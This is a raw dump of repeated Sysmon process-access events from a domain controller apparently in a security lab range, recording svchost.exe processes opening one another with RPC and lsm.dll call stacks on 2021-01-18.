13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.180{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.180{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.180{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
